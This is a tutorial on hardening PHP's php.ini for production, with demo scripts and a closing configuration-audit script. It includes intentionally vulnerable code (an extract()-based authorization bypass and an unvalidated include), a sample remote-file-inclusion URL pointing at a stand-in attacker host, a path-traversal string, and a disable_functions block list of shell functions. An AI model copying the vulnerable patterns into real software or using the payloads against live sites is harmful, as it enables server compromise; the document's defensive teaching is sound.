Securing php configuration for production mode
The Apache-PHP-MySQL combination has become immensely popular for web application development because of how versatile and powerful it is, and all of its components are open source. Unfortunately both Apache and PHP ship with a default configuration which, considered from a security perspective, is not ideal for a production environment, and which tempts developers into insecure techniques during development. In this article I will discuss some of the insecure settings in php.ini, the default configuration file for PHP, and the values you should use in production.
register_globals:
When the register_globals parameter is turned on, all the EGPCS (Environment, GET, POST, Cookie and Server) variables are automatically registered as global variables, which lets an attacker set or overwrite your script's variables simply by naming them in a request. Fortunately it has been disabled by default since PHP 4.2.0 and was removed entirely in PHP 5.4. Do not enable it no matter what. For example, you have probably seen URLs that look like http://www.example.com/somepage.php?someparam=somevalue. When register_globals is on, a variable called $someparam appears in your script with its value set to somevalue before a single line of your code has run, so any variable you forgot to initialise (an $authorized flag, a $path used in an include) can be supplied by the visitor. When register_globals is off, such parameters are available only through $_GET, $_POST and the other superglobals, where your code has to ask for them explicitly. This makes it much harder for someone to inject their own values or code.
Recommended secure setting: register_globals = off
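The following script is an added example and is not part of the original article. Because register_globals no longer exists in current PHP, the first half re-creates its effect with extract(), which is exactly what the setting did for GET data (and what some legacy code did by hand after it was removed), and then shows the classic uninitialised-flag bypass beside the hardened version. The request data, the cookie check and the session value are constructed for the demo; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not from the original article. register_globals was removed in
// PHP 5.4, so its effect (every request parameter becomes a PHP variable) is
// re-created here with extract(). Run from the CLI: php register_globals_demo.php

// Constructed request: an anonymous visitor simply appends ?authorized=1 to the URL.
$_GET    = ['authorized' => '1'];
$_COOKIE = [];                      // no session cookie at all

/** Stand-in for a real session check; returns false for this anonymous request. */
function has_valid_session(): bool
{
    return isset($_COOKIE['session']) && $_COOKIE['session'] === 'valid-session-id';
}

// ---- Vulnerable: relies on $authorized being unset unless the login check sets it ----
extract($_GET);                     // what register_globals = On did for GET data
if (has_valid_session()) {
    $authorized = true;
}
// $authorized was never initialised by the script, so the attacker-supplied "1" survives.
echo 'vulnerable: ', !empty($authorized) ? 'admin' : 'anonymous', "\n";   // admin

// ---- Hardened: register_globals = Off, no extract() of user input, and every ----
// ---- security-relevant variable initialised before it is tested              ----
$authorized = false;
if (has_valid_session()) {
    $authorized = true;
}
// Request data is only reachable through $_GET/$_POST/$_COOKIE, and only where the
// code explicitly asks for it, so ?authorized=1 has no effect here.
echo 'hardened: ', $authorized ? 'admin' : 'anonymous', "\n";             // anonymous
```

The lesson generalises beyond extract(): any code path that copies request data into plain variables (including an old-style foreach over $_REQUEST) re-creates the same hole, whatever php.ini says.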
open_basedir:
You can restrict what PHP can read or write by setting the open_basedir option. When open_basedir is set, PHP's file functions (fopen, file_get_contents, include and so on) can access only files placed in the listed directories and their subdirectories, /var/www/htdocs/files for instance. Two caveats: the value is matched as a path prefix, so /var/www/htdocs/files would also admit /var/www/htdocs/files_old, which is why each entry should end with a slash (several entries are separated with ":" on Unix and ";" on Windows); and the restriction applies only to PHP's own file functions, not to programs started with exec() or system(). With that in mind, you can limit what fopen and other file access functions can read and write by using the following secure setting:
Recommended secure setting: open_basedir = /var/www/htdocs/files/
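The script below is an added example, not code from the original article. It shows what open_basedir blocks and what it does not by tightening the directive at runtime (ini_set can only narrow open_basedir, never widen it, so the behaviour matches a php.ini setting); the demo directory under the system temp dir, the file names and the sibling directory are assumptions so that it runs anywhere. PHP 7.1 or later is assumed.

```php
<?php
// Added example, not from the original article: what open_basedir does and does not
// block. Builds a throw-away directory under the system temp dir (an assumption so the
// script runs anywhere) and tightens open_basedir at runtime. Run: php open_basedir_demo.php

$base = realpath(sys_get_temp_dir()) . '/obd_demo';
@mkdir($base, 0700);
@mkdir($base . '_sibling', 0700);                        // same prefix, different dir
file_put_contents($base . '/allowed.txt', "inside\n");
file_put_contents($base . '_sibling/leak.txt', "prefix match\n");

// Without a trailing slash open_basedir is a *prefix* test: "/x/files" also admits
// "/x/files_sibling". The trailing slash restricts access to the directory itself.
ini_set('open_basedir', $base . '/');

/** Try to read a file and report whether open_basedir let us. */
function try_read(string $path): string
{
    $data = @file_get_contents($path);        // warning suppressed; the result is checked
    return $data === false ? "BLOCKED  $path" : "allowed  $path";
}

echo try_read($base . '/allowed.txt'), "\n";                  // allowed
echo try_read($base . '_sibling/leak.txt'), "\n";             // BLOCKED (thanks to the slash)
echo try_read('/etc/hostname'), "\n";                         // BLOCKED
echo try_read($base . '/../obd_demo_sibling/leak.txt'), "\n"; // BLOCKED: paths are resolved first

// Caveat: open_basedir applies only to PHP's own file functions. It does not constrain
// programs started with exec()/system(), which is why disable_functions is still needed.
```

Removing the trailing slash from the ini_set() line and re-running shows the prefix problem directly: the sibling directory becomes readable.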
expose_php:
PHP reveals its version in several ways: it may send an HTTP header (X-Powered-By: PHP/x.y.z) or append its name and version to Apache's Server signature. There is no reason to let end users know the exact PHP version; it only helps an attacker pick exploits for bugs known in that release. Luckily the expose_php setting in php.ini, when set to Off, disables both.
Recommended secure setting: expose_php = Off
allow_url_fopen:
File handling functions such as fopen, file_get_contents and include accept URLs as file parameters, for example fopen('http://www.example.com/', 'r') or include('http://example.com/page'). If allow_url_fopen is set to Off, only files that reside on your own server can be opened. You won't be able to include a file from a different server, but neither will anybody else. When someone does this maliciously by embedding a URL in an otherwise innocent-looking HTTP request, hoping that your script can be tricked into including and running their code, it is called a Remote File Inclusion (RFI) attack. Having allow_url_fopen = Off dooms all such attacks to fail. Note that since PHP 5.2 include and require are additionally governed by allow_url_include, which is Off by default and only works when allow_url_fopen is On; keep both Off.
Some webmasters think they need allow_url_fopen = On because their pages are already coded to use URLs to include files from their own site or from some external site. It is worth expending some effort to stop doing that so that you can turn allow_url_fopen off. You can include a file from your own site simply by specifying its path and filename. Here is how to convert a URL include to one that does not use a URL:
include $_SERVER['DOCUMENT_ROOT'] . '/page.php';
$_SERVER['DOCUMENT_ROOT'] is a superglobal value set by the web server to the root folder of your site, the equivalent of "/" in a URL, which is usually public_html. Note that it has no trailing "/", so you must provide a leading "/" in '/page.php'.
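As an added example that is not part of the original article, here is a typical "template loader" of the kind RFI attacks target, with the vulnerable version beside a hardened one that uses $_SERVER['DOCUMENT_ROOT'] as described above. The attacker's request, the templates directory, the template names and the temporary DOCUMENT_ROOT used for the CLI run are all constructed for the demo; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not from the original article: a vulnerable include beside a hardened
// one. The request, the template set and the demo DOCUMENT_ROOT are constructed.

// Constructed attacker request (in a real attack: ?page=http://evil.example/shell.txt?).
// The trailing "?" turns the ".php" the script appends into a harmless query string.
$_GET = ['page' => 'http://evil.example/shell.txt?'];

// ---- Vulnerable ------------------------------------------------------------------
// With allow_url_fopen = On and allow_url_include = On this fetches and *executes*
// whatever the remote server returns. With them Off the remote fetch fails, but the
// function is still a local file inclusion bug (?page=../../etc/passwd%00 on old PHP).
function load_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// ---- Hardened --------------------------------------------------------------------
// 1. Never build an include path from raw request data: map it onto a fixed allow-list.
// 2. Build the path from $_SERVER['DOCUMENT_ROOT'] with a leading "/", not from a URL.
// 3. realpath() plus a prefix check as defence in depth against traversal and symlinks.
const TEMPLATES = ['home', 'about', 'contact'];       // assumed template set

function resolve_template(string $page): ?string
{
    if (!in_array($page, TEMPLATES, true)) {
        return null;
    }
    $root = realpath($_SERVER['DOCUMENT_ROOT'] . '/templates');
    $path = realpath($root . '/' . $page . '.php');
    // realpath() returns false if the file is missing; the prefix check catches anything
    // that resolved outside the templates directory.
    if ($root === false || $path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_page_hardened(string $page): void
{
    $path = resolve_template($page);
    if ($path === null) {
        http_response_code(404);
        echo "No such page\n";
        return;
    }
    include $path;
}

// Demo run (CLI): DOCUMENT_ROOT is normally set by the web server; here it points at a
// temp dir containing a harmless home.php so the hardened loader has something real.
$_SERVER['DOCUMENT_ROOT'] = sys_get_temp_dir() . '/rfi_demo';
@mkdir($_SERVER['DOCUMENT_ROOT'] . '/templates', 0700, true);
file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/templates/home.php', "<?php echo \"home page\\n\";\n");

load_page_hardened($_GET['page']);       // "No such page": the URL is not in the allow-list
load_page_hardened('home');              // "home page"
load_page_hardened('../../etc/passwd');  // "No such page"
// load_page_vulnerable($_GET['page']) is deliberately never called.
```

The allow-list is the control that matters; the php.ini settings (allow_url_fopen and allow_url_include both Off) are the safety net for the loader you forgot to fix.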
Now you have a reliable method to refer to any file without having to use relative paths and without using a URL unnecessarily. If you include static content (content that doesn't change) from another of your websites, such as include('http://myothersite.com/includes/footer.php'), you can make a copy of that content in the current site and include it locally as described above. Having duplicate copies of a few files is a small price to pay for the better security of having allow_url_fopen Off. If you cannot avoid it and must fetch content from a remote site by URL, you'll need allow_url_fopen = On. Even then, keep allow_url_include = Off and fetch the content with file_get_contents rather than include, so that the remote data is treated as data and never executed. You can also get some protection against RFI attacks with .htaccess rewrite rules that reject incoming requests whose parameters contain a URL.
Recommended secure setting: allow_url_fopen = Off
display_errors:
By default, PHP prints error messages to the browser's output. While this is desirable during development, on a live site it can reveal information useful to an attacker, such as installation paths, database usernames or fragments of SQL. It is highly recommended to disable this on a production server and send error messages to a log file instead.
Recommended secure setting: display_errors = Off
log_errors & error_log:
The error_log parameter specifies the name of the file in which warnings and errors are stored (this file must be writable by the user or group that Apache runs as, and should live outside the document root so that it cannot be fetched over the web). When log_errors is turned on, all warnings and errors are written to the file specified by the error_log parameter.
If this file is not set or not writable, warnings and errors are handed to the SAPI error logger instead, which under Apache means the web server's own error log.
Recommended secure setting: log_errors = On, error_log = (the path of that log file)
magic_quotes_gpc:
The PHP manual recommends setting this parameter to Off and handling quotes in a more secure manner yourself, with prepared statements or your database driver's own escaping function. Relying on it gives a false sense of security, and the feature was deprecated in PHP 5.3 and removed in PHP 5.4.
Recommended secure setting: magic_quotes_gpc = Off
safe_mode:
If this parameter is set to On, PHP refuses to open files whose owner differs from the owner of the running script, hides most environment variables, and blocks execution of binaries outside safe_mode_exec_dir. However, some very popular third-party scripts, which you might want to use eventually, will not run properly when it is On. In addition, if your web host uses suPHP, safe_mode serves no purpose, because each script already runs as its own account owner. Lastly, safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4 (the planned "PHP 6" was never released), and it was never a reliable security boundary to begin with. Therefore it is best left out of your php.ini file or, if present, set to Off.
Recommended setting: safe_mode = Off
safe_mode_gid:
With safe_mode_gid enabled alongside safe_mode, the ownership check compares the file's group instead of its owner, so PHP will open files that belong to Apache's group regardless of who owns them. This setting and the two below have an effect only on PHP versions that still have safe_mode, and only when safe_mode is On.
Recommended setting: safe_mode_gid = On
safe_mode_exec_dir & safe_mode_allowed_env_vars:
Safe mode also stops PHP from executing binaries, but sometimes you need to let it run specific programs. In that case place those binaries (or symbolic links to them) in a directory, /var/www/binaries for instance, and use the following option:
Recommended setting: safe_mode_exec_dir = /var/www/binaries
Finally, to allow access to certain environment variables, use the following setting, providing a comma-separated list of prefixes. Only environment variables whose names begin with one of the prefixes will be accessible:
Recommended setting: safe_mode_allowed_env_vars = PHP_
disable_functions:
PHP has a lot of potential to damage your server, compromise user accounts and even obtain root. I have seen many cases where an insecure PHP script served as the entry point for running dangerous commands and taking control of the server.
By setting disable_functions to a list of function names, it is possible to deny execution of those functions by any script on your site. Here is an example of its use, with some of the functions that could be disabled for increased security:
disable_functions = exec,shell_exec,passthru,system,show_source,proc_open,popen,parse_ini_file,dl
This tells PHP not to allow the listed functions to be called by any script on your site. Two details matter here: eval is a language construct rather than a function, so it cannot be disabled this way (it is therefore left out of the list), and show_source is an alias of highlight_file, so list both if you want that capability gone. The directive can only be set in php.ini, not from a script or .htaccess, which is exactly why it is useful: a script that has been uploaded by an attacker cannot switch it back off. The functions listed above are especially powerful, and many malicious scripts use them. By blocking their use you limit the damage such scripts can do even if they somehow get onto your site and run.
Note: to deny all web access to your php.ini file (which matters when it lives inside the document root, as on many shared hosts), add the following section to your .htaccess file if it is not already there (Apache 2.2 syntax; on Apache 2.4 use "Require all denied" in place of the Order and Deny lines):
<Files php.ini>
Order allow,deny
Deny from all
</Files>
Source: http://www.articlesbase.com/security-articles/securing-php-configuration-for-production-mode-3836050.html
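Pulling the settings above together, the following is an added example, not code from the original article: a small CLI check that compares the running configuration with the production values recommended in this article and exits non-zero if anything is unsafe. Run it against the php.ini you intend to deploy (the path in the comment is an assumption); because the CLI SAPI has its own defaults for a few directives such as display_errors, always pass the exact file with -c. The list of functions expected in disable_functions is the article's list minus eval, which cannot be disabled that way. PHP 7.1 or later is assumed.

```php
<?php
// Added example, not from the original article: audit the loaded configuration against
// the production values recommended in the article.
// Usage (path is an assumption):  php -c /etc/php/php.ini check_ini.php
// Exit status 1 means at least one setting is unsafe.

/** Normalise php.ini boolean spellings (On/Off, yes/no, 1/0, "") to a PHP bool. */
function ini_bool(string $name): bool
{
    // ini_get() returns false for directives this PHP version no longer knows,
    // which filter_var() also maps to false, so removed settings pass automatically.
    return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

$problems = [];

// Directives that must be Off in production (register_globals, magic_quotes_gpc and
// safe_mode no longer exist in PHP >= 5.4 and simply pass there).
foreach (['register_globals', 'magic_quotes_gpc', 'safe_mode', 'expose_php',
          'display_errors', 'allow_url_fopen', 'allow_url_include'] as $directive) {
    if (ini_bool($directive)) {
        $problems[] = "$directive is On";
    }
}

if (!ini_bool('log_errors')) {
    $problems[] = 'log_errors is Off';
} elseif ((string) ini_get('error_log') === '') {
    $problems[] = 'error_log is not set (errors fall through to the SAPI/Apache log)';
}

if ((string) ini_get('open_basedir') === '') {
    $problems[] = 'open_basedir is empty: PHP may read any file the web server user can';
}

// Functions the article recommends disabling. eval is a language construct and cannot
// appear in disable_functions, so it is deliberately absent from this list.
$wanted   = ['exec', 'shell_exec', 'passthru', 'system', 'show_source',
             'proc_open', 'popen', 'parse_ini_file', 'dl'];
$disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
foreach (array_diff($wanted, $disabled) as $fn) {
    $problems[] = "$fn is still callable (add it to disable_functions)";
}

if ($problems) {
    fwrite(STDERR, "Unsafe production settings:\n - " . implode("\n - ", $problems) . "\n");
    exit(1);
}
echo "php.ini looks production-safe\n";
```

Running the same script under php -n (no php.ini at all) is a quick way to see what the built-in defaults leave open, and wiring it into a deployment pipeline catches the case where a package upgrade silently replaces php.ini with the shipped development version.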